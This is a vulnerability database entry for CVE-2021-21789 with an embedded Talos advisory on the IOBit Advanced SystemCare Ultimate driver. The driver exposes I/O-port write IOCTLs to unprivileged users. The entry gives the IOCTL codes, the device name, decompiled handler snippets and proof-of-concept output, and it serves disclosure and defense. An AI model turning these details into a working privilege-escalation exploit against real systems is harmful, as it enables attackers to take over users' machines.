ID CVE-2021-21789 Type cve Reporter talos-cna@cisco.com Modified 2022-04-28T17:15:00
Description
A privilege escalation vulnerability exists in the way IOBit Advanced SystemCare Ultimate 14.2.0.220 driver handles Privileged I/O write requests. During IOCTL 0x9c40a0e0, the first dword passed in the input buffer is the device port to write to and the dword at offset 4 is the value to write via the OUT instruction. A local attacker can send a malicious IRP to trigger this vulnerability.
{"id": "CVE-2021-21789", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-21789", "description": "A privilege escalation vulnerability exists in the way IOBit Advanced SystemCare Ultimate 14.2.0.220 driver handles Privileged I/O write requests. During IOCTL 0x9c40a0e0, the first dword passed in the input buffer is the device port to write to and the dword at offset 4 is the value to write via the OUT instruction. A local attacker can send a malicious IRP to trigger this vulnerability.", "published": "2021-07-07T17:15:00", "modified": "2022-04-28T17:15:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 4.6}, "severity": "MEDIUM", "exploitabilityScore": 3.9, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21789", "reporter": "talos-cna@cisco.com", "references": ["https://talosintelligence.com/vulnerability_reports/TALOS-2021-1254"], "cvelist": ["CVE-2021-21789"], "immutableFields": [], "lastseen": "2022-04-28T19:33:21", "viewCount": 19, "enchantments": {"dependencies": {"references": [{"type": "talos", "idList": ["TALOS-2021-1254"]}], "rev": 4}, "score": {"value": 4.1, "vector": "NONE"}, "twitter": {"counter": 3, "modified": "2021-07-09T18:17:17", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1415748122253348869", "text": " NEW: CVE-2021-21789 A privilege escalation vulnerability exists in the way IOBit Advanced SystemCare Ultimate 14.2.0.220 driver handles Privileged I/O write requests. During IOCTL 0x9c40a0e0, the first dword pa... (click for more) Severity: HIGH https://t.co/RKYHS0IzfJ?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1415748122253348869", "text": " NEW: CVE-2021-21789 A privilege escalation vulnerability exists in the way IOBit Advanced SystemCare Ultimate 14.2.0.220 driver handles Privileged I/O write requests. During IOCTL 0x9c40a0e0, the first dword pa... (click for more) Severity: HIGH https://t.co/RKYHS0IzfJ?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1415779596763635716", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-21789 (advanced_systemcare_ultimate)) has been published on https://t.co/KHPlHnOi3O?amp=1"}]}, "backreferences": {"references": [{"type": "talos", "idList": ["TALOS-2021-1254"]}]}, "exploitation": null, "vulnersScore": 4.1}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": "Talos", "cvss": {"3": {"vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "score": 8.8}}}, "cpe": ["cpe:/a:iobit:advanced_systemcare_ultimate:14.2.0.220"], "cpe23": ["cpe:2.3:a:iobit:advanced_systemcare_ultimate:14.2.0.220:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"], "affectedSoftware": [{"cpeName": "iobit:advanced_systemcare_ultimate", "version": "14.2.0.220", "operator": "eq", "name": "iobit advanced systemcare ultimate"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:iobit:advanced_systemcare_ultimate:14.2.0.220:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2021-1254", "name": "https://talosintelligence.com/vulnerability_reports/TALOS-2021-1254", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}
{"talos": [{"lastseen": "2022-01-26T11:42:09", "description": "### Summary\n\nA privilege escalation vulnerability exists in the way IOBit Advanced SystemCare Ultimate 14.2.0.220 driver handles Privileged I/O write requests. A specially crafted I/O request packet (IRP) can lead to privileged writes which can result in elevation of privileges of the current user. A local attacker can send a malicious IRP to trigger this vulnerability.\n\n### Tested Versions\n\nIOBit Advanced SystemCare Ultimate 14.2.0.220\n\n### Product URLs\n\n<https://www.iobit.com/>\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\n\n### CWE\n\nCWE-782 - Exposed IOCTL with Insufficient Access Control\n\n### Details\n\nIOBit Advanced SystemCare Ultimate provides a solution for keeping track of running services, processes that are using a large amount of memory, software updates, and the ability to update drivers to latest versions.\n\nAdvanced SystemCare also provides a monitoring driver to help faciltate its tasks. This driver creates `\\Device\\IOBIT_WinRing0_1_3_0` which is readable and writable to everyone. The driver also provides a callback for handling `IRP_MJ_DEVICE_CONTROL` requests to the driver.\n\nThe driver used in this analysis is below:\n\nMonitor_win10_x64.sys e4a7da2cf59a4a21fc42b611df1d59cae75051925a7ddf42bf216cc1a026eadb\n\n#### CVE-2021-21787 - Exposed OUT byte\n\nDuring IOCTL `0x9c40a0d8`, the first `dword` passed in the input buffer is the device port to write to and the `byte` at offset 4 is the value to write via the `OUT` instruction. The `OUT` instruction can write one byte to the given I/O device port, potentially leading to escalated privileges of unprivileged users.\n \n \n Monitor_win10_x64.sys+0x11310\n \n u32_at_0 = *(_DWORD *)input_buffer_1;\n switch ( ioctl )\n {\n case 0x9C40A0D8:\n __outbyte(u32_at_0, *((_BYTE *)input_buffer_1 + 4));\n goto LABEL_64;\n \n\n#### CVE-2021-21788 - Exposed OUT word\n\nDuring IOCTL `0x9c40a0dc`, the first `dword` passed in the input buffer is the device port to write to and the `word` at offset 4 is the value to write via the `OUT` instruction. The `OUT` instruction can write one byte to the given I/O device port, potentially leading to escalated privileges of unprivileged users.\n \n \n Monitor_win10_x64.sys+0x11310\n \n u32_at_0 = *(_DWORD *)input_buffer_1;\n switch ( ioctl )\n {\n ...\n case 0x9C40A0DC:\n __outword(u32_at_0, *((_WORD *)input_buffer_1 + 2));\n goto LABEL_64;\n \n\n#### CVE-2021-21789 - Exposed OUT dword\n\nDuring IOCTL `0x9c40a0e0`, the first `dword` passed in the input buffer is the device port to write to and the `dword` at offset 4 is the value to write via the `OUT` instruction. The `OUT` instruction can write one byte to the given I/O device port, potentially leading to escalated privileges of unprivileged users.\n \n \n Monitor_win10_x64.sys+0x11310\n \n u32_at_0 = *(_DWORD *)input_buffer_1;\n switch ( ioctl )\n {\n ...\n case 0x9C40A0E0:\n __outdword(u32_at_0, *((_DWORD *)input_buffer_1 + 1));\n goto LABEL_64;\n \n\n#### Exploit Proof of Concept\n\nIn combination with the exposed `IN` instruction, an unprivileged user can access PCI devices on the system.\n \n \n Opening Device\n File Handle: 0xa0\n Dumping PCI devices\n Device: 0x1237 Vendor: 0x8086\n Device: 0x7000 Vendor: 0x8086\n Device: 0x100e Vendor: 0x80ee\n Device: 0x2668 Vendor: 0x8086\n Device: 0x003f Vendor: 0x106b\n Device: 0x7113 Vendor: 0x8086\n Device: 0x2829 Vendor: 0x8086\n \n\n### Timeline\n\n2021-03-10 - Follow up with vendor \n2021-04-30 - 2nd follow up with vendor \n2021-05-17 - 3rd follow up with vendor \n2021-06-27 - Final follow up with vendor \n2021-07-07 - Public release\n", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-07T00:00:00", "type": "talos", "title": "IOBit Advanced SystemCare ultimate privileged I/O write vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21787", "CVE-2021-21788", "CVE-2021-21789"], "modified": "2021-07-07T00:00:00", "id": "TALOS-2021-1254", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1254", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}]}
